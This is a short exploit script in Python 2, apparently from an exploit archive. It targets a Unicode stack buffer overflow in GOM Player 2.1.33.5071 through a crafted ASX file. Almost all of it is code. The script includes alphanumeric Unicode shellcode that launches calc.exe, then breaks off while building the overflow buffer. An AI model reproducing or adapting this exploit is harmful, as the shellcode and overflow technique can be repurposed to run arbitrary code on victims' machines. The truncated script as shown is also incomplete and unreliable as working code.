# Exploit Title: GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution. # Version: 2.1.33.5071 # Date: 30-11-2011 # Author: Debasish Mandal # Email : debasishm89@gmail.com # Software Link: http://www.gomlab.com/eng/GMP_download.html # Category:: Local # Tested on: Windows XP SP2. # Many Many Thanks to P.V.Eeckhoutte & Nilanjan De #!/usr/bin/python print "#############################################################################################" print "## GOM Player Crafted ASX File Unicode Stack Buffer Overflow and Arbitrary Code Execution.#" print "## Version: 2.1.33.5071 #" print "## Author :: Debasish Mandal #" print "## Email : debasishm89@gmail.com #" print "## Blog: http://www.debasish.in/ #" print "#############################################################################################" raw_input("[*] Press Enter to generate the crafted ASX...") size = 2046 #Shellcode WinExec "Calc.exe" Unicode shellcode = "PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AI" shellcode += "AIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBvz5tz9ptkthtPZOCI95hVsXKl" shellcode += "iqqVQNR4CUrm4p1pBlSm32qFxhK1dGymgtBT7KaWXZUKNKDhyKwRD3M4kIgjNWcoPbSw2Vg9C8" shellcode += "qpkJHPTWONmGWC5QaNrRktfZsLnvqZZxsLOmJlOl5oXmvWpdgKQzmR3pXKuPSPhNy9YXXVpMQ4" shellcode += "LknUTeKronnLU5GYH3FKm9oL8bgzRHcEuHN1o6wUn6quYo9Mn7pUEZFjaxMkkkFMvHii3tM7Li" shellcode += "z0yTVM6RQeUKceKvqNNsS3OK0Wsr2LKHnMxzpNsL2noxujOJn7khxOO1wuOWnSkXLQ4sNEm3xN" shellcode += "K3OwmMDBsKuf5DvgPOlXtwljwJLqruILX8ntLu940wojgQ6kVIPXMNCL8vJnlJeRqcBLELTKLu" shellcode += "48sNz8yLFZVo2KNLWPsKw6ZeOBOnuyC1ef0uz7dQOzSrmPFKSZTA" buff = '' buff += 'ArirangTV